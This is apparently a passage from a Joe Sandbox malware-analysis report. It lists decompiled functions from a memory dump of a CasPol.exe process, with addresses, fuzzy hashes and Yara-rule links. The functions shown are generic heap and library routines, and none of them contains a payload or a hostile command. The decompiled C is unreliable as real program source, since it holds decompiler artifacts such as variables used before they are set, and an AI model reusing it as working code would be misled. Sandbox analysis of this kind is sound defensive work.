					L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                                0x016dd38a
                                                                0x016dd39b
                                                                0x016dd3b1
                                                                0x00000000
                                                                0x016dd3b6
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                • Instruction ID: dea13337a1426a598fc4de436ef6d09bfe48d89bcdd1cddc9a9f920f964ba034
                                                                • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                • Instruction Fuzzy Hash: 3CE0C231680615BBDB226E84CC00F797B17EB507A0F124035FE089A7D0CA759C91DAC8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0165A185 Relevance: .0, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0165A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x17167e4 >= 0xa) {
					if(_t5 < 0x1716800 || _t5 >= 0x1716900) {
						return L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E01640010(0x17167e0, _t5);
				}
			}





                                                                0x0165a190
                                                                0x0165a1a6
                                                                0x0165a1c2
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0165a192
                                                                0x0165a192
                                                                0x0165a19f
                                                                0x0165a19f

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cc0beb19b3add0122eda54419b08767d4608ba6772bba2f844849bdc042eb141
                                                                • Instruction ID: 15132c02e442c997a89bc907942a75f096cd331f25aa8d4de9d7978ad8fa79ac
                                                                • Opcode Fuzzy Hash: cc0beb19b3add0122eda54419b08767d4608ba6772bba2f844849bdc042eb141
                                                                • Instruction Fuzzy Hash: 1AD02E611650001BC73E63A88D14B213613F780B61F344A2CF3030FAA8EAE088D4C20C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016516E0 Relevance: .0, Instructions: 17COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E016516E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E01651710(0x17167e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L01644620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                                0x016516e8
                                                                0x016516ef
                                                                0x016516f3
                                                                0x016516fe
                                                                0x00000000
                                                                0x01651700
                                                                0x0165170d
                                                                0x0165170d
                                                                0x016516f2
                                                                0x016516f2
                                                                0x016516f2
                                                                0x016516f2

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8f299ed1ffdb91c4bff9458c236f8f01cc3ef425b6ac4d8e725b9d6208f6bdc8
                                                                • Instruction ID: e39f089d829fc03d1e4cd6ca85bcc44461a3701c7fa28bdc661ca9d42a1a03df
                                                                • Opcode Fuzzy Hash: 8f299ed1ffdb91c4bff9458c236f8f01cc3ef425b6ac4d8e725b9d6208f6bdc8
                                                                • Instruction Fuzzy Hash: 97D0A931240201A2EB2E6B189C14B242A52EB91B81F38006CFA1B599C0CFB0CCA2E46C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016A53CA Relevance: .0, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E016A53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0163EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                                0x016a53ca
                                                                0x016a53ce
                                                                0x016a53d9
                                                                0x016a53de
                                                                0x016a53e1
                                                                0x016a53e1
                                                                0x016a53e6
                                                                0x016a53f3
                                                                0x00000000
                                                                0x016a53f8
                                                                0x016a53fb

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                • Instruction ID: a9dc1bf1c16e8ceba886c9a70e3b091c195be02759e1c0784715b3ae59f1aa7a
                                                                • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                • Instruction Fuzzy Hash: FAE08C319006809FCF12DB48CA50F5EBBF6FF84B00F140408A5095F720C724EC00CB00
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0163AAB0 Relevance: .0, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0163AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                                0x0163aab6
                                                                0x0163aabb
                                                                0x0168a442
                                                                0x00000000
                                                                0x0168a448
                                                                0x0168a454
                                                                0x0168a454
                                                                0x0163aac1
                                                                0x0163aac1
                                                                0x0163aac6
                                                                0x0163aac6

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                • Instruction ID: 927f33e2fa5deae2046d488497613c79400f2f018439fbf096b42fcc38c14f8e
                                                                • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                • Instruction Fuzzy Hash: DCD0C935352980CFD617CB4CC954B0533A4FB44B40FC50490E940CB722E72CD940CA00
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016535A1 Relevance: .0, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E016535A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0163EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                                0x016535a1
                                                                0x016535a1
                                                                0x016535a5
                                                                0x016535ab
                                                                0x016535ab
                                                                0x016535b5
                                                                0x00000000
                                                                0x016535c1
                                                                0x016535b7

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                • Instruction ID: bd5e8e638c52f2ecc5eaf2578ed34defc96362c34a171c390ff41e315ae68777
                                                                • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                • Instruction Fuzzy Hash: 99D0A9314011819AEB82AB24CA387683BB2BF00B8CF58306988030EB52C33A8A0AC604
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0162DB40 Relevance: .0, Instructions: 11COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0162DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L01644620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                                0x0162db4d
                                                                0x0162db54
                                                                0x0162db5f
                                                                0x0162db56
                                                                0x0162db56
                                                                0x0162db5c
                                                                0x0162db5c

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                • Instruction ID: 7dbee2969f4053718137fa957fd7199414d8e1ef3c77e98f1d66b600b571f8d0
                                                                • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                • Instruction Fuzzy Hash: C2C08C70280A11ABEB222F20CD02B403AA1BB10B02F4400A0A300DA0F0DF78D801EA00
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016AA537 Relevance: .0, Instructions: 11COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E016AA537(intOrPtr _a4, intOrPtr _a8) {

				return L01648E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                                0x016aa553

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                • Instruction ID: 2f7d4568ad6095e056e5bc80b47cdca1b2b6f7fc4f4d5650ed5c2203a5ad65b2
                                                                • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                • Instruction Fuzzy Hash: 8FC01232080248BBCB226F81CC00F067F2AEBA4B60F008014BA080B5608632E970EA88
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01643A1C Relevance: .0, Instructions: 10COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E01643A1C(intOrPtr _a4) {
				void* _t5;

				return L01644620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                                0x01643a35

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                • Instruction ID: 42d546f33d33bde5ae5a56cdc1bf779854b7eed7089a962814f6638ec3196db5
                                                                • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                • Instruction Fuzzy Hash: 86C04C32180648BBC7126E45DD01F557B6AE7A4B60F154025B6040A5618976ED61D59C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0162AD30 Relevance: .0, Instructions: 10COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0162AD30(intOrPtr _a4) {

				return L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                                0x0162ad49

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                • Instruction ID: cc5e1e7bd2b32c7ef4ad752f7b2eb433703fd619be59dd81c5033bbd6af65b30
                                                                • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                • Instruction Fuzzy Hash: 26C08C32080248BBC712AA45CD00F117B2AE7A0B60F000020F6040A6618A32E860D588
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016376E2 Relevance: .0, Instructions: 10COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E016376E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                                0x016376e4
                                                                0x00000000
                                                                0x016376f8
                                                                0x016376fd

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                • Instruction ID: 9e0ca016e1dc891b630efe16394c83fd2108061da7d4e98304f8b616548ba18c
                                                                • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                • Instruction Fuzzy Hash: 57C08CB01411805BEB2A970CCE30B303A91AB49608F88019CEB01296A3C368A802D208
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016536CC Relevance: .0, Instructions: 10COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E016536CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L01644620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                                0x016536d2
                                                                0x016536e8
                                                                0x016536d4
                                                                0x016536e5
                                                                0x016536e5

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                • Instruction ID: 873e1a32259812205de4aa9e6b9506a031bbd8d8287174eb442229629daabc80
                                                                • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                • Instruction Fuzzy Hash: 77C02B70150440FBD7152F30CD01F157254F700F61F64035C7220456F0DE289C00E104
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01647D50 Relevance: .0, Instructions: 7COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E01647D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                                0x01647d56
                                                                0x01647d5b
                                                                0x01647d60
                                                                0x01647d5d
                                                                0x01647d5d
                                                                0x01647d5d

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                • Instruction ID: 9263b7b35dc5c96dccd475275d5197581f661376c0bde7fb83e4afc9ffab3c56
                                                                • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                • Instruction Fuzzy Hash: 49B092363119408FCF16DF28C480B1533E4FB44A40B8400D0E400CBA21D329E8008900
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01652ACB Relevance: .0, Instructions: 5COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E01652ACB() {
				void* _t5;

				return E0163EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                                0x01652adc

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                • Instruction ID: b19373cefe9989480268cb850507d9644d7f1f7b3d8cb5f47c9a85409e88019f
                                                                • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                • Instruction Fuzzy Hash: 41B092328104418BCF06AB40CA10B197332AB40650F0544949002279208229AC01CA50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669950 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4daa18d86fb035e80cf578624b0c123ebf7a0bf41404a5abc4612d15e4f73d78
                                                                • Instruction ID: 6ba179e8db29523badb7aaa0d7a0992a4c8d92bb3cf3271b48836704a1291a8e
                                                                • Opcode Fuzzy Hash: 4daa18d86fb035e80cf578624b0c123ebf7a0bf41404a5abc4612d15e4f73d78
                                                                • Instruction Fuzzy Hash: DA9002A120140403E14069994C056070109ABD0342F51C411A2055555ECA698C517175
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016699D0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ed9f1a997581a26454cf7ed05b3a8225f832c4a1926b10968ed7a6c9ca5de342
                                                                • Instruction ID: 1df0e60ac55d9a0ad12bd007528b9fde91f7c1774b666385966e587e532da214
                                                                • Opcode Fuzzy Hash: ed9f1a997581a26454cf7ed05b3a8225f832c4a1926b10968ed7a6c9ca5de342
                                                                • Instruction Fuzzy Hash: 6D9002A121100042E104659948057070149ABE1241F51C412A2145554CC5698C616165
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0166B040 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 001244e9d65371d23a2ac804870c8b91f8101baecda47feaa2d94b3a668cecff
                                                                • Instruction ID: 2d4ebce7e9dea323dba25b777313216d9f0758877e90b675a450ef6e80612011
                                                                • Opcode Fuzzy Hash: 001244e9d65371d23a2ac804870c8b91f8101baecda47feaa2d94b3a668cecff
                                                                • Instruction Fuzzy Hash: BB9002A1601140435540B5994C054075119BBE1341391C521A0445560CC6A88855A2A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669820 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a96636a707fb6d01c0d542704a87c57d1e6511ed273dea0c030bcedf81ca7dd0
                                                                • Instruction ID: c2bd6a9db21e24cd9d171b2942eadd1609406e8e9b40e4aff7da2aa5bb5f1d80
                                                                • Opcode Fuzzy Hash: a96636a707fb6d01c0d542704a87c57d1e6511ed273dea0c030bcedf81ca7dd0
                                                                • Instruction Fuzzy Hash: 0A90027124100402E14175994805607010DBBD0281F91C412A0415554EC6958A56BAA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016698A0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 403640f1091aa97e797e8c0007ba30bcff8e61a2b0895bd8d6e79e4e75b0be32
                                                                • Instruction ID: 6ee87e913fdd82fbeb488262bbbd788cfc76aad530361b29b81b60ebb3757911
                                                                • Opcode Fuzzy Hash: 403640f1091aa97e797e8c0007ba30bcff8e61a2b0895bd8d6e79e4e75b0be32
                                                                • Instruction Fuzzy Hash: DD90026130100402E10265994815607010DEBD1385F91C412E1415555DC6658953B172
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669B00 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 049e64242d50935beb68ec01fa980c84607a84b72ac3e8f550051bf3a68a8c83
                                                                • Instruction ID: 136f0786caa02370e09b0ea31dfec39aa428624a96d036dca490d7e8f2fbfa12
                                                                • Opcode Fuzzy Hash: 049e64242d50935beb68ec01fa980c84607a84b72ac3e8f550051bf3a68a8c83
                                                                • Instruction Fuzzy Hash: E490026124100802E14075998815707010AEBD0641F51C411A0015554DC656896576F1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0166A3B0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: be8709d80826463bcd7d9b77fb722a9d96e4f098873482dfc745ea01b5263c94
                                                                • Instruction ID: e425114436a612044864edf274967c2973fb880d294440043ba2b99cf554982b
                                                                • Opcode Fuzzy Hash: be8709d80826463bcd7d9b77fb722a9d96e4f098873482dfc745ea01b5263c94
                                                                • Instruction Fuzzy Hash: 6A90027120144002E1407599884560B5109BBE0341F51C811E0416554CC6558856A261
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669A10 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 89f83bdce8981c83f8454a9ebaf35fe3a51da42ded94bce675abb5dc3bb1b273
                                                                • Instruction ID: 7a1523b8f387751be29d0b0477bf27080b6dcc561c7a401d9b308ab465d27f71
                                                                • Opcode Fuzzy Hash: 89f83bdce8981c83f8454a9ebaf35fe3a51da42ded94bce675abb5dc3bb1b273
                                                                • Instruction Fuzzy Hash: 2990027120140402E10065994C097470109ABD0342F51C411A5155555EC6A5C8917571
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669A80 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d8cbd23a0031658d41a83a7b3e771ea789c0e431c6dfedbf5f5edc9121f992fe
                                                                • Instruction ID: ae272c195b4efb2b3d7da921e11de43ddab22d6be2fb4b1919f0c9360381fff4
                                                                • Opcode Fuzzy Hash: d8cbd23a0031658d41a83a7b3e771ea789c0e431c6dfedbf5f5edc9121f992fe
                                                                • Instruction Fuzzy Hash: 5E90026120144442E14066994C05B0F4209ABE1242F91C419A4147554CC95588556761
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669560 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 942e4601b8628dbb246315da614f6f932afbd2a9aae7905a45fa3daf0aada173
                                                                • Instruction ID: b0dc06cf9073030efb1981ab098b8f37513667faa4ce6f01945e57b350e797e7
                                                                • Opcode Fuzzy Hash: 942e4601b8628dbb246315da614f6f932afbd2a9aae7905a45fa3daf0aada173
                                                                • Instruction Fuzzy Hash: 14900265221000021145A9990A0550B0549BBD6391391C415F1407590CC66188656361
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
